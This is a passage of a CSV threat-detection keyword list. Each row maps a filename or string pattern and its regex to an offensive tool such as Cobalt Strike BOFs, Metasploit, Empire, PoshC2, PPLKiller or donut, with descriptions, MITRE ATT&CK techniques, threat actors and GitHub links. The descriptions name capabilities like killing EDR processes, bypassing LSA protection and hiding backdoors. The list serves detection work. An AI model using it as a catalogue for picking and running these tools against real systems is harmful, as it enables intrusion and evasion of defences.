T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*process_killer.exe*",".{0,1000}process_killer\.exe.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","4","345","63","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" "*process_memdump.rb*",".{0,1000}process_memdump\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*process_mimikatz*",".{0,1000}process_mimikatz.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*process_protection_enum *",".{0,1000}process_protection_enum\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A Syscall-only BOF file intended to grab process protection attributes. limited to a handful that Red Team operators and pentesters would commonly be interested in.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Process_Protection_Level_BOF","1","0","N/A","10","10","50","8","2021-08-30T00:18:57Z","2021-08-29T23:08:22Z" "*process_protection_enum*.dmp*",".{0,1000}process_protection_enum.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*process_protection_enum.*",".{0,1000}process_protection_enum\..{0,1000}","offensive_tool_keyword","cobaltstrike","A Syscall-only BOF file intended to grab process protection attributes. limited to a handful that Red Team operators and pentesters would commonly be interested in.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Process_Protection_Level_BOF","1","1","N/A","10","10","50","8","2021-08-30T00:18:57Z","2021-08-29T23:08:22Z" "*Process_Protection_Level_BOF.*",".{0,1000}Process_Protection_Level_BOF\..{0,1000}","offensive_tool_keyword","cobaltstrike","A Syscall-only BOF file intended to grab process protection attributes. limited to a handful that Red Team operators and pentesters would commonly be interested in.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Process_Protection_Level_BOF","1","1","N/A","10","10","50","8","2021-08-30T00:18:57Z","2021-08-29T23:08:22Z" "*Process_Protection_Level_BOF/*",".{0,1000}Process_Protection_Level_BOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A Syscall-only BOF file intended to grab process protection attributes. limited to a handful that Red Team operators and pentesters would commonly be interested in.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Process_Protection_Level_BOF","1","1","N/A","10","10","50","8","2021-08-30T00:18:57Z","2021-08-29T23:08:22Z" "*process_snapshot.exe*",".{0,1000}process_snapshot\.exe.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","286","33","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*ProcessCommandChannelImplantMessage*",".{0,1000}ProcessCommandChannelImplantMessage.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","470","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "*ProcessDestroy.x64*",".{0,1000}ProcessDestroy\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*ProcessDestroy.x64.*",".{0,1000}ProcessDestroy\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*ProcessDestroy.x86*",".{0,1000}ProcessDestroy\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*ProcessDestroy.x86.*",".{0,1000}ProcessDestroy\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*ProcessEncryptedC2Request*",".{0,1000}ProcessEncryptedC2Request.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","470","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "*ProcessFileZillaFile*",".{0,1000}ProcessFileZillaFile.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ProcessHerpaderping_x64*",".{0,1000}ProcessHerpaderping_x64.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ProcessHerpaderping_x86*",".{0,1000}ProcessHerpaderping_x86.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ProcessHerpaderpingTemplate*",".{0,1000}ProcessHerpaderpingTemplate.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*processhider.c*",".{0,1000}processhider\.c.{0,1000}","offensive_tool_keyword","Sudomy","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Vegile","1","1","N/A","N/A","7","695","162","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z" "*-ProcessID * -Dll * -Module *",".{0,1000}\-ProcessID\s.{0,1000}\s\-Dll\s.{0,1000}\s\-Module\s.{0,1000}","offensive_tool_keyword","empire","empire script arguments Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*processImplantMessage*",".{0,1000}processImplantMessage.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*process-inject *",".{0,1000}process\-inject\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "*processinject_min_alloc*",".{0,1000}processinject_min_alloc.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","971","149","2024-04-02T20:12:17Z","2021-08-06T20:55:26Z" "*ProcessManager.exe --machine *",".{0,1000}ProcessManager\.exe\s\-\-machine\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*ProcessManager.exe --name explorer*",".{0,1000}ProcessManager\.exe\s\-\-name\sexplorer.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*processPIDByName*lsass.exe*",".{0,1000}processPIDByName.{0,1000}lsass\.exe.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","9","815","130","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" "*ProcessPPKFile*",".{0,1000}ProcessPPKFile.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 